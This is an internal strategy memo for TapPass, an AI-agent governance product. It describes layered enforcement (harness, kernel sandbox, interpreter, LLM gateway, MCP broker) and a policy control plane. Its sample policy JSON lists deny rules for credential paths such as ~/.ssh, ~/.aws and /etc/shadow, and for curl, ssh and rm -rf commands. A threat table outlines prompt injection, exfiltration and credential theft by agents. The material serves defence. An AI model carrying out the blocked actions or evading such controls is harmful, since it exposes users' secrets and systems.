TapPass — Strategy Memo v3

Status: Internal · Strategic · Canonical strategic frame for the architecture canon.
Date: 2026-04-28 · v3.0
Subtitle: The One-Stop Shop for Agentic Governance

Two architectural pillars — an enforcement plane of three rings and many targets, and a control plane that pushes, pulls and reconciles policy across them — making TapPass the neutral authority for how every agent runs in every enterprise.

Terraform + Istio + OPA, applied to agent runtimes.


Part I — Strategic context (why now, and why the category exists)

  • 01 Executive summary
  • 02 The market moment: why now, and why in twelve months is too late
  • 03 The problem: what every existing tool misses
  • 04 The thesis: three rings, one substrate, neutral ground
  • 05 Competitive landscape

Part II — Architectural vision (the substrate)

  • 06 The enforcement plane: rings, targets & cross-cutting layers (LLM Gateway + MCP Broker)
  • 07 The control plane: Compiled Policy, providers, push/pull/reconcile
  • 08 Mapping agent surfaces to the architecture
  • 09 Nine scaling vectors
  • 10 What we are explicitly not doing

Part III — Tactical execution (getting it shipped)

  • 11 Product shape: Runtime, Control, Intelligence
  • 12 Quarter-by-quarter roadmap (Q2 2026 → 2027)
  • 13 Organizational implications & resourcing
  • 14 Moats and defensibility
  • 15 Risks and how we mitigate them

Part IV — Practical walkthroughs

  • 16 Scenario 1: Fintech CISO rolls out Claude Code to 200 engineers
  • 17 Scenario 2: Startup developer runs a governed agent solo
  • 18 Scenario 3: Healthcare AI team ships a production agent
  • 19 Sample policy cascade: one source, three rings
  • 20 The first 30 / 60 / 90 days of shipping Runtime v1

Part V — Decision

  • 21 Decisions requested
  • 22 Glossary & references

Agentic AI is crossing from experiment to production faster than any enterprise software category in a decade. CISOs do not have a governance stack built for it. Every existing tool covers exactly one layer of the problem — the harness, the container, or the interpreter — and none of them integrate. TapPass has quietly built foundational pieces at all three layers. The opportunity is to connect them into a single policy substrate and define the category before it names itself.

  1. The problem is three rings, plus two cross-cutting layers. A real agentic-governance stack must enforce at three distinct in-process rings — the harness (agent CLI / framework permissions), the kernel (container / sandbox), and the interpreter (language VM executing agent-generated code) — and at two cross-cutting layers between processes: the LLM Gateway (every prompt and response intercepted at the model API) and the MCP Broker (every tool call intercepted at the tool-RPC layer). Five enforcement positions, organized as 3 + 2 (ADR 0001).

  2. The architecture is two pillars, not one.

    • Pillar 1 — Enforcement Plane: three rings + two cross-cutting layers. Rings are the stable taxonomy; targets multiply (OpenShell, nono, gVisor, Firecracker, K8s NetworkPolicy, sandbox-exec for kernel; Claude Code, Codex, Cursor, Cline, LibreChat, Element bots for harness; Monty, V8 isolates, Wasmtime for interpreter). Cross-cutting layers (LLM Gateway, MCP Broker) sit between processes and are always compulsory.
    • Pillar 2 — Control Plane: a canonical Compiled Policy authored in Rego, rendered by per-target providers (ADR 0002), distributed via push (SSE) and pull (HTTP), reconciled continuously against an agent registry. Compiled Policy content is organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring (ADR 0003).

    Terraform + Istio + OPA, applied to agent runtimes.

  3. TapPass already has most of the ingredients. OpenShell + nono cover the kernel ring. The SDK's SandboxManager + SSE policy push + trust tiers + forbidden zones cover most of the control loop. The CLI (tappass run claude) is the distribution surface. Env-var redirection (OPENAI_BASE_URL/ANTHROPIC_BASE_URL) is the gateway in primitive form. What is missing is the unifying canonical Manifest, second-ring providers, and the reconciler that closes the loop — the four-piece Minimum Credible Substrate that proves the architecture end-to-end.

  4. The architecture generalizes across every agent surface we can reach. CLI agents (Claude Code, Gemini CLI, Codex CLI, Cursor) — direct three-ring fit. Self-hosted web UIs (LibreChat, OpenWebUI, Open Devin) — plugin/SDK harness, server kernel, gateway. Chat-bot deployments (Element/Matrix, Slack, Discord, Teams) — bot-framework SDK, channel-aware policy. Custom code — SDK direct + gateway. Vendor-hosted SaaS (claude.ai, ChatGPT.com, Gemini in Workspace) is honestly out of scope; pair with vendor admin tooling.

  5. The commercial bet is a three-product shape. Runtime (open-core SDK + CLI + providers, viral distribution), Control (SaaS + on-prem dashboard, authoring, marketplace, compliance reports), and Intelligence (cross-customer behavioral baselines, the long-run data moat). Three flywheels, one substrate.

Make TapPass the neutral substrate every enterprise trusts to say "yes" to agentic AI — three in-process rings of enforcement, two cross-cutting layers (LLM Gateway + MCP Broker), and a control plane that pushes, pulls and reconciles Compiled Policy across every agent surface we can reach.

  • Commit to the Minimum Credible Substrate as the Q2 2026 shipping target.
  • Promote the LLM gateway to a first-class element alongside the rings, with Gemini / Vertex AI as the first roadmap upstream-API addition.
  • Fund MCP Governance as a parallel workstream starting now.
  • Plan agent-surface coverage as the Q3–Q4 expansion: LibreChat plugin, Element / Matrix bot SDK, additional CLI providers.
  • Cement neutrality as cultural policy: we govern every framework, pick no winners.

Three curves are crossing in 2026 that make this the precise window for agentic governance to become its own category:

Curve A: production deployment of agent CLIs in development environments. Claude Code, Cursor, Codex, Cline, Windsurf, Aider, Continue — all are now shipping with paying enterprise tiers. Developer laptops have become the most privileged, least-governed attack surface in the modern enterprise. The agents can read source code, write code, run build systems, and execute shell commands — driven by a non-deterministic LLM that will follow a prompt-injection attack through three tool calls before anyone notices.

Curve B: regulatory arrival. EU AI Act enforcement is in effect. ISO/IEC 42001 is becoming the default AI management system standard in procurement. NIST AI RMF is referenced in every US federal RFP. SOC 2 auditors are beginning to specifically ask "how do you govern AI agents?" and the honest answer today is "we don't." This is a buying trigger, not a nice-to-have.

Curve C: MCP and codemode becoming the dominant capability patterns. MCP (Model Context Protocol) is becoming the standard way agents acquire capability. Codemode — agents writing Python / JS to accomplish tasks — is becoming the dominant pattern for non-trivial work. Both are wildly under-governed today. Whoever builds the reference governance layer in 2026 owns the conversation in 2027 and beyond.

The category does not exist yet; it will exist in twelve months. Who defines it defines the taxonomy buyers will use to evaluate every tool that comes after. TapPass should be first with a name, a stack, and a proof-point customer story.

Why TapPass is positioned to win this window

  • Infrastructure already built: OPA cascade, OpenShell integration, SSE policy push, trust tiers, forbidden zones, exfil blocklist, audit pipeline. No competitor starts this far down the runway.
  • Distribution moat already primed: pip install tappass, tappass run claude. Zero-friction developer onboarding.
  • Airgapped / on-prem option already shipping: tappass-platform license server for regulated customers.
  • Neutral positioning is still possible: no entrenched commitment to any one agent framework, MCP server, or cloud.

03 · The Problem: Why Every Existing Tool Misses

Every existing sandbox, allowlist, or policy tool lives on one of three floors in the same building. Each one, by itself, misses two entire classes of threat.

The harness layer alone is cooperative, not compulsory

Tools like Claude Code's .claude/settings.json are enforced inside the agent. The harness checks permissions.allow/deny/ask before it runs a tool. Rich semantics — but the same process that enforces the rule can also skip it.

What harness-only policy cannot defend against:

  • A compromised or modified agent binary (the enforcement is the binary).
  • Prompt injection that routes through an allowed tool.
  • The agent spawning a subprocess that inherits full user credentials and FS access.
  • A zero-day in the agent itself, in any loaded MCP server, or in any tool binary on $PATH.

The kernel layer alone is compulsory, not semantic

Tools like OpenShell, gVisor, Firecracker, Landlock and seccomp enforce outside the agent. The kernel returns EACCES or drops a packet regardless of what the agent thinks it is doing. Provably contains a hostile binary, but blind to meaning.

What kernel-only policy cannot do:

  • Distinguish "legitimate HTTPS to GitHub for the agent's work" from "HTTPS to GitHub to exfiltrate source code".
  • Prevent the agent from using an allowed tool in a malicious way.
  • Author policy in terms developers and auditors understand.
  • Integrate with the harness's tool catalogue, skill registry, or MCP server list.

The interpreter layer alone is hard but narrow

Runtimes like Monty, V8 isolates, Wasmtime contain code the agent writes: a Python snippet the LLM produced, a JavaScript expression to filter events, a SQL query to compute a metric. Hard enforcement, but only protects the generated code.

What interpreter-only policy misses:

  • The agent process that wrote the code still has full OS rights.
  • Tool calls the agent makes directly (not through generated code) are ungoverned.
  • Network egress from outside the interpreter is unrestricted.

A CISO today must choose, buy, and operate three different systems that do not share a policy model, do not share an audit trail, and drift independently. Agents on a developer laptop, in CI, on Kubernetes, and in a browser each get a different ad-hoc policy.

| Threat | Harness | Kernel | Interpreter |
| --- | --- | --- | --- |
| Agent calls a disallowed tool on purpose (user error / misuse) | ✓ primary | partial | - |
| Prompt injection routes through allowed tool to unallowed effect | partial | ✓ primary | - |
| Compromised or modified agent binary | - | ✓ primary | - |
| Malicious code generated by the LLM (codemode) | - | partial | ✓ primary |
| Exfiltration via DNS / covert channel | - | ✓ primary (L7 proxy) | - |
| Credential theft via env-var dump | - | ✓ primary (cred hiding) | ✓ partial (no ambient env) |
| Supply-chain attack through MCP server | partial (attestation) | ✓ (network containment) | - |

Any serious governance stack has to cover all three rings or accept that two out of three attack surfaces remain open.


04 · The Thesis: Two Pillars and Neutrality

The thesis has three parts: two architectural pillars, plus a cultural commitment. Each must be true for the whole to work.

Pillar 1 — The Enforcement Plane (rings, targets & cross-cutting layers)

Three rings describe kinds of enforcement that sit inside the agent's process. Within each ring, many targets exist — specific tools or runtimes that fill the ring on a particular platform. Rings are the stable taxonomy; targets are the long tail. TapPass picks no canonical target; it ships providers for whichever ones a customer actually runs.

Two cross-cutting layers sit between processes — always compulsory, always reachable, no runtime-specific cooperation needed: the LLM Gateway (every prompt and response) and the MCP Broker (every tool call). They are not rings; they are peer enforcement positions that catch what the rings cannot reach (third-party code, BYOK clients, MCP servers we don't ship). See ADR 0001 — Rings, not layers.

| Position | Type | Governs | Targets |
| --- | --- | --- | --- |
| Ring 1: Harness | Semantic, cooperative · in-process | What tool calls an agent attempts | Claude Code, Codex, Cline, Cursor, Windsurf, Aider, LangGraph, CrewAI, Autogen, TapPass SDK agents |
| Ring 2: Kernel | Compulsory, coarse · in-process | What the agent process can do | OpenShell, nono, gVisor, Firecracker, bubblewrap, macOS sandbox-exec, Windows AppContainer, K8s NetworkPolicy + Gatekeeper, Fargate |
| Ring 3: Interpreter | Narrow, hard · in-process | What code the agent writes can do | Monty, V8 isolates, Wasmtime, restricted DuckDB, WebContainers |
| Cross-cutting: LLM Gateway | Compulsory · between processes | Every prompt + response | tappass/gateway/ (Anthropic-native, OpenAI-compat, LiteLLM 100+ providers; shipped) |
| Cross-cutting: MCP Broker | Compulsory · between processes | Every MCP tool call (outbound + inbound) | tappass/gateway/mcp_server.py + per-org MCP registry; schema_acl + loop_guard pipeline steps |

Pillar 2 — The Control Plane (Compiled Policy, providers, push/pull/reconcile)

The enforcement plane is the muscle; the control plane is the brain. It is what makes "one policy, many enforcement positions, continuously updated" a technical reality. Three responsibilities:

  1. Author and emit — the OPA cascade evaluates Rego with org/project/agent inputs and emits a single canonical, signed, versioned Compiled Policy (ADR 0003). Content is organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring — the same aspect can be enforced at multiple positions.
  2. Render and distribute — per-target providers (ADR 0002) turn the Compiled Policy into target-specific config. The control plane pushes updates over SSE; agents pull at boot or on demand.
  3. Reconcile and detect drift — the agent registry tracks which agent runs which Compiled Policy version. The reconciler closes the loop: re-pushing where ACKs are missing, alerting on drift, surfacing stale agents.

AUTHOR: OPA / Rego cascade · GitOps · simulation · shadow mode
  ▼ evaluate
CANONICAL: Compiled Policy · signed · versioned · single source of truth
  ▼ render via providers
HARNESS: settings.json · Claude Code · Codex · Cline
KERNEL: OpenShell · nono · gVisor · Firecracker · K8s NetworkPolicy
INTERPRETER: monty manifest · V8 · Wasmtime
  ▼ push (SSE) · pull (HTTP) · reconcile
ENFORCEMENT + TELEMETRY: agent executes · actions signed · audit streamed · ACK with manifest version

TapPass must not compete with any agent framework or sandbox vendor. We govern all of them. Every vendor's commercial interest aligns with ours when we say "yes" to integration. This is how the service mesh was won by Istio/Envoy (neutral data plane) and lost by proprietary alternatives.

Neutrality is not a marketing claim — it is an architectural and organizational commitment that shows up in the roadmap, the partnerships, and the hiring profile.


| Category | Representative players | Ring covered | Why they don't cross the rings |
| --- | --- | --- | --- |
| Framework-native permission files | Claude Code settings.json, Cursor, Cline, Aider configs | Harness | Each vendor owns only its own harness. None aim to govern the OS or other vendors' CLIs. |
| Container / syscall sandboxing | gVisor, Firecracker, Docker, Podman, OpenShell, Landlock, seccomp | Kernel | Generic sandbox tech, no semantic policy for tools / MCP / skills. |
| Runtime interpreter sandboxes | Monty, Pyodide, V8 isolates, Wasmtime, Deno | Interpreter | Only protect generated code; ignore the agent process and harness. |
| Cloud IAM / service mesh | AWS IAM, Azure AD, Istio, Kyverno, OPA Gatekeeper | Adjacent to kernel | Governs services, not agent-specific semantics; no harness awareness. |
| AI observability / eval | Arize, Langfuse, Weights & Biases, Braintrust | - | Observe, do not enforce. Complementary, not competitive. |
| LLM firewalls / content filters | Lakera Guard, Prompt Armor, Robust Intelligence | Harness (partial) | Inspect prompts/outputs; no policy over tools, processes, or generated code. |
| EDR / Cloud workload protection | CrowdStrike, SentinelOne, Wiz | Kernel (generic) | Generic workload protection; no agent vocabulary, no framework integration. |

Not by being better than any one of these, but by being the only vendor whose single policy substrate spans all three rings, on all three operating systems, across all agent frameworks. Adjacent tools become integration partners, not rivals.

  • vs. framework-native: we integrate with them, not replace them. Claude Code's settings.json becomes one provider target.
  • vs. sandbox vendors: we consume them. OpenShell is one of our shipped kernel-ring providers; adding gVisor or Firecracker is a new provider, not a rewrite.
  • vs. observability: we generate the signals they consume.
  • vs. EDR: we are the agent-specific vocabulary EDR vendors lack.

Be the neutral substrate. Make every adjacent tool's life easier. Make every framework vendor look better for being "officially governed by TapPass". The only vendor we compete with head-on is the greenfield competitor who tries to build the same substrate — and we are already 18 months ahead.


06 · Pillar 1: The Enforcement Plane (Rings, Targets & Cross-Cutting Layers)

Rings are categories of enforcement — three of them, defined by the threat class each catches and the layer of the stack each operates at. Targets are specific implementations that fill out a ring on a particular platform. Providers are per-target plug-ins that render the Compiled Policy as native target config (Terraform-style — see ADR 0002). TapPass is agnostic across targets and ships providers for whichever ones customers actually run.

Ring 1 — Harness (semantic, cooperative)

Governs: what tool calls an agent attempts. Rich semantic vocabulary; cooperative enforcement.

Targets: Claude Code managed-settings.json; Codex CLI ~/.codex/config.toml; Cline / Cursor / Windsurf per-vendor configs; Aider .aider.conf.yml; LangGraph / CrewAI / Autogen tool-catalogue APIs; TapPass SDK agents (manifest direct).

What TapPass contributes: one central policy that renders correct syntax for each target's native file. Always writes the enterprise-managed layer where the target supports it. Inspects project-local and user-layer policies for conflicts.

Governs: what the agent process can do. Filesystem boundaries (Landlock, macOS sandbox-exec, Windows AppContainer, K8s volumes), network egress control (L7 proxy or kernel-level), syscall filtering (seccomp), process namespacing, credential hiding (proxied keys), binary identity verification.

Targets:

| Target | Form factor | Best for | Update model |
| --- | --- | --- | --- |
| OpenShell | Container + L7 proxy | Servers, CI, K8s | Hot-reload network; restart for FS/exec |
| nono | Capability sandbox (Landlock / sandbox-exec) | Developer laptops | Restart-only |
| gVisor | User-space kernel | Cloud Run, GKE | Per-pod restart |
| Firecracker | microVM | AWS, Fly.io, multi-tenant edge | VM restart |
| bubblewrap | Lightweight namespaces | Linux dev / CI | Restart-only |
| macOS sandbox-exec | OS-native sandbox | macOS-specific | Restart-only |
| Windows AppContainer | OS-native isolation | Windows | Restart-only |
| K8s NetworkPolicy + Gatekeeper | Cluster-level | K8s admission + runtime | Live |

Why several targets matter: customers don't choose their OS or topology. A fintech CISO governs Macs, Linux servers, and EKS pods all at once. The substrate has to render the same Manifest into the right target for each surface.

Governs: what code the agent writes can do. Microsecond startup, zero ambient authority, capabilities injected explicitly.

Targets:

| Target | Language | Notes |
| --- | --- | --- |
| Monty | Python (subset) | Rust-based; microsecond startup; capability-only API; checkpointing |
| Pyodide | Python (full) | WASM-Python; heavier but full stdlib |
| V8 isolates | JS / TS | Cloudflare Workers pattern |
| Wasmtime | WASM polyglot | Capabilities via WASI |
| Restricted DuckDB | SQL | Analytical-codemode (data agents) |

Why this ring matters more than it looks: Codemode is becoming the dominant agentic pattern. Instead of orchestrating twelve tool calls, the LLM writes one Python function. This shifts the enforcement burden off the harness onto the interpreter. Owning the interpreter ring is a future-proofing move.
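
To make "zero ambient authority, capabilities injected explicitly" concrete, here is a minimal sketch of the idea in plain Python. It is not Monty's API: `HOST_REGISTRY`, `build_capabilities`, `call_capability` and the stub functions are hypothetical names, and only the `host_functions` key is taken from the Compiled Policy example in this memo. It illustrates the grant model only and is not itself a sandbox.

```python
import json
from typing import Callable, Dict, List

# Hypothetical host-side registry: everything the platform *could* expose.
# The HTTP and file entries are stubs; no real I/O happens in this sketch.
HOST_REGISTRY: Dict[str, Callable] = {
    "json_parse": json.loads,
    "http_get": lambda url: f"GET {url}",
    "http_post": lambda url, body: f"POST {url}",
    "read_file": lambda path: f"READ {path}",
}


def build_capabilities(host_functions: List[str]) -> Dict[str, Callable]:
    """Return only the functions the policy grants; nothing else is reachable."""
    unknown = [name for name in host_functions if name not in HOST_REGISTRY]
    if unknown:
        raise ValueError(f"policy grants unknown host functions: {unknown}")
    return {name: HOST_REGISTRY[name] for name in host_functions}


def call_capability(caps: Dict[str, Callable], name: str, *args):
    """Generated code can only reach the host through this lookup."""
    if name not in caps:
        raise PermissionError(f"capability not granted: {name}")
    return caps[name](*args)


# The "interpreter" aspect from the Compiled Policy example.
policy_interpreter = {"host_functions": ["http_get", "http_post", "json_parse"]}
caps = build_capabilities(policy_interpreter["host_functions"])
```

In this sketch `read_file` exists on the host but is never handed to generated code, so a call to it fails with `PermissionError` rather than falling back to ambient access.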

Cross-cutting — LLM Gateway and MCP Broker

The three rings govern what an agent does inside its process. The two cross-cutting layers govern what crosses process boundaries: every model call (LLM Gateway) and every tool call (MCP Broker). Different threat surfaces, same Compiled Policy, always compulsory. They reach agents we cannot otherwise instrument — code we don't own, third-party MCP servers, custom integrations, BYOK clients.

LLM Gateway — every prompt, every response

What lives here:

  • Every LLM call (prompt + completion) for every governed agent flows through tappass/gateway/.
  • The SDK already does this: it injects OPENAI_BASE_URL / ANTHROPIC_BASE_URL.
  • Upstream API support: OpenAI-compatible · Anthropic-native · LiteLLM 100+ providers. Roadmap: Google AI Studio + Vertex AI (Gemini), self-hosted via vLLM / Ollama / TGI.

What it enforces: PII detection & redaction, secrets scanning, prompt-injection signatures, response filters, budget caps, rate limits, BYOK key management, full audit. Capability tokens (ES256, JWKS-verified) carry per-call scope.

Why it is the universal entry point: a native harness provider requires per-CLI integration work. The kernel ring requires a sandbox runtime. The interpreter ring requires codemode adoption. The gateway requires only that the consumer is configured with a base URL — a one-line change. For agents we cannot otherwise reach, the gateway is the one enforcement layer that always works.
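
The "one-line change" can be sketched as an environment override applied before launching the agent process. This is an illustration under assumptions: `gateway_env` is a hypothetical helper and both URLs are placeholders; only the two variable names come from this memo.

```python
import os
from typing import Dict, Mapping, Optional


def gateway_env(
    openai_url: str,
    anthropic_url: str,
    base_env: Optional[Mapping[str, str]] = None,
) -> Dict[str, str]:
    """Copy an environment and point both SDK base URLs at the gateway."""
    env = dict(os.environ if base_env is None else base_env)
    env["OPENAI_BASE_URL"] = openai_url
    env["ANTHROPIC_BASE_URL"] = anthropic_url
    return env


# Placeholder gateway addresses, for illustration only.
env = gateway_env(
    "https://gateway.example.internal/openai",
    "https://gateway.example.internal/anthropic",
    base_env={"PATH": "/usr/bin"},
)
```

The resulting mapping can be passed as `env=` to `subprocess.run`, so the child process inherits the redirection without any change to the agent's own code.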

What lives here:

  • Every MCP connection — outbound (agent → upstream tool servers) and inbound (external systems → the agent's tools) — passes through the TapPass MCP broker.
  • Per-org MCP server registry: which servers are approved, with attested SBOMs and signed allowlists.
  • Pipeline steps schema_acl and loop_guard enforce per-call resource access and stop runaway agents.

What it enforces: which tools each Compiled Policy allows; which parameters and schemas each tool can use; rate limits per tool; data-class tagging of responses; capability-token-bound session scope.
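
As a rough illustration of how a step like loop_guard might stop a runaway agent, the sketch below rejects a call once the same tool and arguments have been seen too often inside a time window. The class, its parameters and the sliding-window approach are assumptions made for illustration; the memo names the step but does not describe its implementation.

```python
from collections import deque
from typing import Deque, Dict, Tuple


class LoopGuard:
    """Hypothetical sliding-window guard against repeated identical tool calls."""

    def __init__(self, max_repeats: int = 3, window_s: float = 60.0) -> None:
        self.max_repeats = max_repeats
        self.window_s = window_s
        self._seen: Dict[Tuple[str, str], Deque[float]] = {}

    def allow(self, tool: str, args_fingerprint: str, now: float) -> bool:
        """Return False once a (tool, args) pair exceeds max_repeats in the window."""
        times = self._seen.setdefault((tool, args_fingerprint), deque())
        # Forget calls that have aged out of the window.
        while times and now - times[0] > self.window_s:
            times.popleft()
        if len(times) >= self.max_repeats:
            return False
        times.append(now)
        return True
```

Passing `now` explicitly keeps the guard deterministic in tests; a caller would typically supply `time.monotonic()`.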

Why it is the second cross-cutting layer (not just a Q4 productization push): the same tools.deny aspect of the Compiled Policy that lands on a harness provider as a settings.json allow/deny rule also lands at the MCP broker as a per-call check. Defense in depth across positions, all from one Compiled Policy (ADR 0003).
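
A minimal sketch of the broker-side half of that defense in depth: the same `tools` aspect evaluated as a per-call check. Glob matching via `fnmatch` is a stand-in for whatever matcher the real broker or harness uses, `check_tool_call` is a hypothetical name, and the default-deny fallback is an assumption.

```python
from fnmatch import fnmatchcase
from typing import Dict, List


def check_tool_call(tools: Dict[str, List[str]], call: str) -> str:
    """Evaluate one tool call against the policy's tools aspect. Deny wins."""
    if any(fnmatchcase(call, pattern) for pattern in tools.get("deny", [])):
        return "deny"
    if any(fnmatchcase(call, pattern) for pattern in tools.get("allow", [])):
        return "allow"
    return "deny"  # assumption: anything not explicitly allowed is denied


# The tools aspect from the Compiled Policy example in this memo.
tools = {
    "allow": ["Bash(cargo:*)", "Bash(uv:*)", "WebFetch(domain:github.com)", "Skill(*)"],
    "deny": ["Bash(curl:*)", "Bash(ssh:*)", "Bash(rm -rf:*)"],
}
```

Checking deny rules first means a call that matches both lists is still blocked, which is the conservative reading of an allow/deny pair.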

What the cross-cutting layers cannot do alone

On their own, the cross-cutting layers cannot block tool calls the agent makes locally without going through the gateway or broker, contain a compromised agent process, or control what generated code can do. They are necessary but not sufficient: the full enforcement plane is three rings + two cross-cutting layers.


07 · Pillar 2: The Control Plane (Compiled Policy, Providers, Push/Pull/Reconcile)

TapPass is structurally Terraform + Istio + OPA, applied to agent runtimes. Terraform's declarative source and provider-plugin model. Istio's continuous control-plane reconciling a heterogeneous data plane. OPA's policy engine (literally — we already use it). Each precedent solves a piece; the novelty is putting all three together for a new domain.

7.1 The canonical Manifest — the single source of truth

The OPA cascade evaluates Rego with inputs from agent identity, trust tier, data classification, time/rate/budget state, and session chain. Its sole output is a signed, versioned Compiled Policy. Providers never see Rego; they see only the Compiled Policy. This is the architectural seam that makes everything composable.

Compiled Policy — canonical form (abbreviated):

{
  "version": 1017,
  "issued_at": "2026-04-28T12:00:00Z",
  "identity": {
    "agent_id": "claude-code@team-eng.acme.com",
    "tier": "worker",
    "chain": ["orchestrator@team-eng.acme.com"]
  },
  "network": {
    "allow_domains": ["api.anthropic.com", "github.com", "pypi.org"],
    "deny_categories": ["paste_services", "webhooks", "dyndns"]
  },
  "filesystem": {
    "workspace": "/workspace",
    "read_only": ["/app/read-only-mounts"],
    "deny_paths": ["~/.ssh", "~/.aws", "~/.kube", "/etc/shadow"]
  },
  "tools": {
    "allow": ["Bash(cargo:*)", "Bash(uv:*)", "WebFetch(domain:github.com)", "Skill(*)"],
    "deny": ["Bash(curl:*)", "Bash(ssh:*)", "Bash(rm -rf:*)"]
  },
  "interpreter": {
    "host_functions": ["http_get", "http_post", "json_parse"],
    "memory_mb": 128, "cpu_time_ms": 5000, "stack_depth": 256
  },
  "budget": {"tokens_per_day": 500000, "dollars_per_month": 200, "tool_calls_per_minute": 60},
  "compliance_tags": ["SOC2:CC6.1", "ISO42001:6.2.3"]
}
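
One way to picture "signed, versioned" is a signature over a canonical serialization of the policy, so every provider verifies the same bytes. The sketch below uses HMAC-SHA256 purely as a stand-in that runs on the standard library; the memo does not specify the signing scheme, and a real deployment would more plausibly use asymmetric signatures. All function names are hypothetical.

```python
import hashlib
import hmac
import json


def canonical_bytes(policy: dict) -> bytes:
    """Serialize with sorted keys and fixed separators so equal policies hash equally."""
    return json.dumps(policy, sort_keys=True, separators=(",", ":")).encode("utf-8")


def sign_policy(policy: dict, key: bytes) -> str:
    """Stand-in signature: HMAC-SHA256 over the canonical form."""
    return hmac.new(key, canonical_bytes(policy), hashlib.sha256).hexdigest()


def verify_policy(policy: dict, signature: str, key: bytes) -> bool:
    """Constant-time comparison of the expected and presented signatures."""
    return hmac.compare_digest(sign_policy(policy, key), signature)
```

Canonicalizing before signing matters because two JSON documents with the same content but different key order would otherwise produce different signatures.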

Each provider is a pure function: provider(compiled_policy, target_capabilities) → target_config. Adding a target = writing a provider. This is the Terraform analogy made literal (ADR 0002). Providers compose with the Compiled Policy, so a single policy renders to many enforcement targets simultaneously. A Runtime is the operator-authored recipe that combines one provider per ring + the gateway/MCP-broker config; sandboxes are bound to runtimes.
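
The pure-function shape can be sketched for a harness target as follows. This is an assumption-laden illustration, not the shipped provider: `render_harness_settings`, the `rule_kinds` capability key and the `unrendered` field are hypothetical, and the output only mirrors the permissions.allow/deny layout mentioned earlier for settings.json.

```python
from typing import Any, Dict, List, Set, Tuple


def _split_by_support(rules: List[str], supported: Set[str]) -> Tuple[List[str], List[str]]:
    """Separate rules the target can express from rules it cannot."""
    rendered, skipped = [], []
    for rule in rules:
        kind = rule.split("(", 1)[0]  # "Bash(cargo:*)" -> "Bash"
        if kind in supported:
            rendered.append(rule)
        else:
            skipped.append(rule)
    return rendered, skipped


def render_harness_settings(
    compiled_policy: Dict[str, Any], target_capabilities: Dict[str, Any]
) -> Dict[str, Any]:
    """provider(compiled_policy, target_capabilities) -> target_config, with no side effects."""
    tools = compiled_policy.get("tools", {})
    supported = set(target_capabilities.get("rule_kinds", []))
    allow, skipped_allow = _split_by_support(tools.get("allow", []), supported)
    deny, skipped_deny = _split_by_support(tools.get("deny", []), supported)
    return {
        "settings": {"permissions": {"allow": allow, "deny": deny}},
        # Rules this target cannot express; another position must enforce them.
        "unrendered": skipped_allow + skipped_deny,
    }
```

Reporting unrendered rules instead of silently dropping them is a design choice in this sketch: it lets the control plane see which aspects still need coverage at another enforcement position.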

7.3 The control loop — push, pull, reconcile

This is the leg most "AI governance" tools miss and the leg that distinguishes TapPass as a control plane rather than a static config tool.

| Mode | Direction | Use case |
| --- | --- | --- |
| Push | Control → Data plane (SSE bus) | Manifest version bumps; broadcast to all connected agents; expect ACK within seconds. Primary path for live updates. |
| Pull | Data → Control plane (HTTP fetch) | Agent boots and fetches its assigned Manifest. Agent reconnects after offline and catches up. Periodic heartbeat verifies version match. Resilience and bootstrap. |
| Reconcile | Control plane internal (background loop) | Compares desired Manifest version per agent against last-ACK'd version. Re-pushes where ACKs are missing. Marks drifted agents. Surfaces stale or disconnected agents. |
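
One pass of the reconcile mode might look like the sketch below. The record fields, the action names and the five-minute staleness threshold are assumptions chosen for illustration; the memo describes the behavior, not the implementation.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class AgentRecord:
    """Hypothetical slice of the agent registry used by the reconciler."""
    agent_id: str
    desired_version: int
    acked_version: Optional[int]  # None means no ACK received yet
    seconds_since_seen: float


def reconcile(records: List[AgentRecord], stale_after_s: float = 300.0) -> List[Tuple[str, str]]:
    """Compare desired and last-ACK'd versions and decide one action per agent."""
    actions: List[Tuple[str, str]] = []
    for record in records:
        if record.seconds_since_seen > stale_after_s:
            # Disconnected agents are surfaced, not re-pushed into the void.
            actions.append((record.agent_id, "mark_stale"))
        elif record.acked_version != record.desired_version:
            actions.append((record.agent_id, "repush"))
    return actions
```

Agents whose ACK matches the desired version produce no action, so a healthy fleet yields an empty list.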

Per-target update semantics: every target has its own update model (hot-reload, restart-only, file rewrite). The supervisor library in the SDK encapsulates these so the user-visible promise — "policy updates apply within seconds" — holds across all of them.
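
A sketch of how a supervisor could encapsulate those per-target differences: given which policy aspects changed, pick the least disruptive action the target supports. The table contents are transcribed from the kernel-target table in this memo; the lowercase target keys, the `plan_update` function and the restart default for unknown targets are hypothetical.

```python
from typing import Dict, Iterable

# A restart subsumes a hot-reload, which subsumes a live change.
_SEVERITY = {"live": 0, "hot-reload": 1, "restart": 2}

# "*" is the fallback for aspects without a specific entry.
UPDATE_MODELS: Dict[str, Dict[str, str]] = {
    "openshell": {"network": "hot-reload", "*": "restart"},
    "nono": {"*": "restart"},
    "gvisor": {"*": "restart"},
    "k8s-networkpolicy": {"*": "live"},
}


def plan_update(target: str, changed_aspects: Iterable[str]) -> str:
    """Return the most disruptive action required by any changed aspect."""
    # Assumption: unknown targets are treated conservatively as restart-only.
    model = UPDATE_MODELS.get(target, {"*": "restart"})
    needed = [model.get(aspect, model["*"]) for aspect in changed_aspects]
    if not needed:
        return "noop"
    return max(needed, key=lambda action: _SEVERITY[action])
```

For example, a network-only change on OpenShell can be hot-reloaded, while the same change bundled with a filesystem change forces a restart.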

7.4 The state store — what the control plane knows

A central registry tracks every governed agent. Without this, push and pull are blind broadcasts; with it, the control plane knows what's actually deployed and can act on drift.

Agent registry — schema (abbreviated):

{
  "agent_id": "claude-code@team-eng.acme.com",
  "session_id": "s-abc-123",
  "identity_hash": "sha256:9f1c…",
  "desired_manifest_version": 1017,
  "applied_manifest_version": 1017,
  "applied_state": {
    "harness": {"target": "claude-code", "version": 1017, "ack_at": ""},
    "kernel": {"target": "nono", "version": 1017, "ack_at": "", "mode": "restart"},
    "interpreter": {"target": "monty", "version": 1017, "ack_at": ""}
  },
  "drift": null,
  "last_seen": "2026-04-28T12:34:01Z",
  "platform": {"os": "darwin", "arch": "arm64", "claude_code_version": "1.0.142"}
}
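
Given a registry record of this shape, per-ring drift can be read straight off the fields. The sketch below is illustrative only: `ring_drift` is a hypothetical helper, and treating any version mismatch as drift is an assumption about how the `drift` field would be derived.

```python
from typing import Any, Dict


def ring_drift(record: Dict[str, Any]) -> Dict[str, int]:
    """Map each ring whose applied version differs from the desired one to that version."""
    desired = record["desired_manifest_version"]
    return {
        ring: state["version"]
        for ring, state in record["applied_state"].items()
        if state["version"] != desired
    }


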